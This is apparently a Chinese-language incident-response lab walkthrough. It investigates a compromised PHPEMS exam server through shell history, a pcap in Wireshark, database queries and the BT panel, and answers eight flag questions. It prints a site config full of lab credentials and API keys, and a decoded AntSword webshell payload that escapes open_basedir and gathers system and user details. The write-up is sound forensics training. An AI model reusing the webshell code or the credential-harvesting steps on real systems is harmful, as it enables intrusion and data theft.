载入虚拟机，打开虚拟机：

居然是没有图形化界面的那种linux，账户密码：root/Inch@957821.（注意是大写的i还有英文字符的.）

查看虚拟机IP，192.168.230.10是NAT模式下自动分配的

看起来不是特别舒服，用连接工具MobaXterm或者Xshell进行连接：

查看当前路径下的文件：

发现有wp和数据包两个看起来挺重要的文件

wp文件有执行权限，先运行wp：

看来wp是个解题程序

1、攻击者IP

2、攻击者修改的管理员密码

3、第一次webshell的连接URL

4、webshell连接密码

5、数据包的flag1

6、攻击者使用的后续上传的木马文件名称

7、攻击者隐藏的flag2

8、攻击者隐藏的flag3

下载数据包1.pcang

上传whoamifuck.sh文件，给予执行权限并运行：

得到两个IP，但应该只有一个IP是攻击者的（题目没说有两个IP），试验一下是哪个IP

看来攻击者IP是192.168.20.1

history命令查看历史命令，发现flag3：

得到flag3：flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}

wireshark打开刚才下载的数据包1.pcang

ip.addr==192.168.20.1，搜索关键词”flag1“：

当然也可以追踪tcp流，发现在流20：

得到flag1：flag1{Network@_2020_Hack}

查看开放的服务有哪些：

./whoamifuck.sh -x

发现mysqld和bt服务在运行（这个bt后面再讲）

在/www/wwwlogs/access.log中发现了”GET /phpmyadmin“：

说明网站搭建数据库是使用了phpmyadmin，直接去找配置文件config.inc.php

最后在/www/wwwroot/127.0.0.1/lib目录下找到了config.inc.php文件：

查看config.inc.php文件内容：

<?php

/** 常规常量设置 */
define('DOMAINTYPE','off');
define('CH','exam_');
define('CDO','');
define('CP','/');
define('CRT',180);
define('CS','1hqfx6ticwRxtfviTp940vng!yC^QK^6');//请随机生成32位字符串修改此处值
define('HE','utf-8');
define('PN',10);
define('TIME',time());
if(dirname($_SERVER['SCRIPT_NAME']))
{
    define('WP','http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/');
}
else
{
    define('WP','http://'.$_SERVER['SERVER_NAME'].'/');
}
define('OPENOSS',false);

/**接口加密设置**/
define('APIKEY','356d9abc2532ceb0945b615a922c3370');
define('APIIV','#phpems90iv*');
/**composer开关**/
define('COMPOSER',0);
/** 数据库设置 */
define('SQLDEBUG',0);
define('DB','kaoshi');//MYSQL数据库名
define('DH','127.0.0.1');//MYSQL主机名，不用改
define('DU','kaoshi');//MYSQL数据库用户名
define('DP','5Sx8mK5ieyLPb84m');//MYSQL数据库用户密码
define('DTH','x2_');//系统表前缀，不用改

/** 微信相关设置 */
define('USEWX',false);//微信使用开关，绑定用户，false时不启用
define('WXAUTOREG',false);//微信开启自动注册,设置为false时转向登录和注册页面，绑定openid
define('WXPAY',false);
//define('FOCUSWX',true);//强制引导关注微信
//define('WXQRCODE','qrcode.png');//微信公众号二维码地址
define('EP','@phpems.net');//微信开启自动注册时注册邮箱后缀
define('OPENAPPID','wx7703aa61284598ea');//开放平台账号
define('OPENAPPSECRET','36745ed4d4ea9da9f25e7b3ccd06d5ef');
define('MPAPPID','wx7703aa61284598ea');//小程序账号
define('MPAPPSECRET','36745ed4d4ea9da9f25e7b3ccd06d5ef');
define('WXAPPID','wx6967d8319bfeea19');//公众号账号
define('WXAPPSECRET','4d462a770aebb7460e2284cbd448cee0');
define('WXMCHID','1414206302');//MCHID
define('WXKEY','72653616204d16975931a46f9296092e');

/** 支付宝相关设置 */
define('ALIPAY',false);
/**MD5**/
define('ALIPART','111171660');
define('ALIKEY','os11111117fmljymmcau');
define('ALIACC','[email protected]');
/**RAS2**/
define('ALIAPPID','2016072738');
define('ALIPRIKEY','MIIEogIBAMXsHR2vhl3BqWBbXfDaIcrJgNssIUddVCX6fT9YWiPXCiCeu5M=');
define('ALIPUBKEY','MIIBIjANXRkaDw6wIDAQAB');

/** payjz相关设置 */
define('PAYJSASWX','NO');//使用PAYJZ的微信支付接口代替微信支付，不使用请设置为NO
define('PAYJSMCHID','1551052561');
define('PAYJSKEY','Zz8ks1ZP3UPKeTGi');
?>

数据库账户密码：

kaoshi: 5Sx8mK5ieyLPb84m

登录数据库：

mysql -ukaoshi -p5Sx8mK5ieyLPb84m

show databases;

use kaoshi;

show tables;

select * from x2_user_group;

select * from x2_user where userid=1;

得到管理员密码是Network@2020

再次回到wireshark的报文，由前面的flag1在tcp流的流20中，从1开始查看：

发现在流1是一堆乱码，流2中第一次看到正常的报文，url解码流2的关键代码

Network2020=@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {
    $ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
    $oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);
    @array_push($oparr,$ocwd,sys_get_temp_dir());
    foreach($oparr as $item) {
        if(!@is_writable($item)) {
            continue;
        }
        ;
        $tmdir=$item."/.fd491f470fb7";
        @mkdir($tmdir);
        if(!@file_exists($tmdir)) {
            continue;
        }
        $tmdir=realpath($tmdir);
        @chdir($tmdir);
        @ini_set("open_basedir", "..");
        $cntarr=@preg_split("/\\\\|\//",$tmdir);
        for ($i=0;$i<sizeof($cntarr);$i++) {
            @chdir("..");
        }
        ;
        @ini_set("open_basedir","/");
        @rmdir($tmdir);
        break;
    }
    ;
}
;
;
function asenc($out) {
    return $out;
}
;
function asoutput() {
    $output=ob_get_contents();
    ob_end_clean();
    echo "4a0c"."dc70";
    echo @asenc($output);
    echo "db6"."da5";
}
ob_start();
try {
    $D=dirname($_SERVER["SCRIPT_FILENAME"]);
    if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
    $R="{$D}    ";
    if(substr($D,0,1)!="/") {
        foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";
    } else {
        $R.="/";
    }
    $R.="   ";
    $u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
    $s=($u)?$u["name"]:@get_current_user();
    $R.=php_uname();
    $R.="   {$s}";
    echo $R;
    ;
}
catch(Exception $e) {
    echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();

丢个AI分析一下：

那就找对了，说明第一次webshell的连接URL是：index.php?user-app-register

此时注意到Network2020=@ini_set("display_errors", "0");

这句代码基本是所有webshell客户端链接PHP类WebShell都有的一种代码

比如蚁剑：

得知webshell连接密码是：Network2020

为了获取webshell木马文件，将http包和POST请求过滤出来：

http && http.request.method==POST

发现POST了一个version2.php，此时回想起history命令得到的结果中显示了删除version2.php的命令记录，version2.php应该是木马文件？

后面追踪了version2.php的tcp流

看到别人说这是冰蝎的webshell特征：

去wp验证一下对不对吧

说明后续上传的木马名称是version2.php

还差一个flag2，再回顾一下history命令：

发现在隐藏目录.api/中修改了mpnotify.php和alinotify.php文件

看看修改了alinotify.php什么内容：

成功得到flag2：flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}

总结一下：

1、192.168.20.1

2、Network@2020

3、index.php?user-app-register

4、Network2020

5、flag1{Network@_2020_Hack}

6、version2.php

7、flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}

8、flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}

成功攻克该靶机！

前面提到的bt是什么，bt是宝塔面板，该靶机是利用宝塔面板管理的

修改宝塔面板密码为root：

查看宝塔面板默认信息：

https://192.168.230.10:12485/5a2ce72d

uysycv5w/root

登录宝塔面板：

在“日志”模块发现基本上都是192.168.20.1的IP地址访问：

当然，在“网站”模块一样能发现异常访问：

攻击者IP：192.168.20.1

在“数据库”模块查看phpMyAdmin管理员密码：

一眼看出是md5加密：

管理员密码：Network@2020

在“网站”模块中添加靶机IP（192.168.230.10）

访问靶机，发现是个PHPEMS模拟考试系统：

利用获取到的管理员账户密码：peadmin/Network@2020进行登录，进入到“后台管理”：

在“文件”模块的“内容/标签管理/标签修改”处发现木马，且位置在“注册页面”：

得到webshell连接密码：Network2020

注册页面URL：

得知第一次webshell连接的URL：index.php?user-app-register

后续的步骤也基本一致了，这里就不再赘述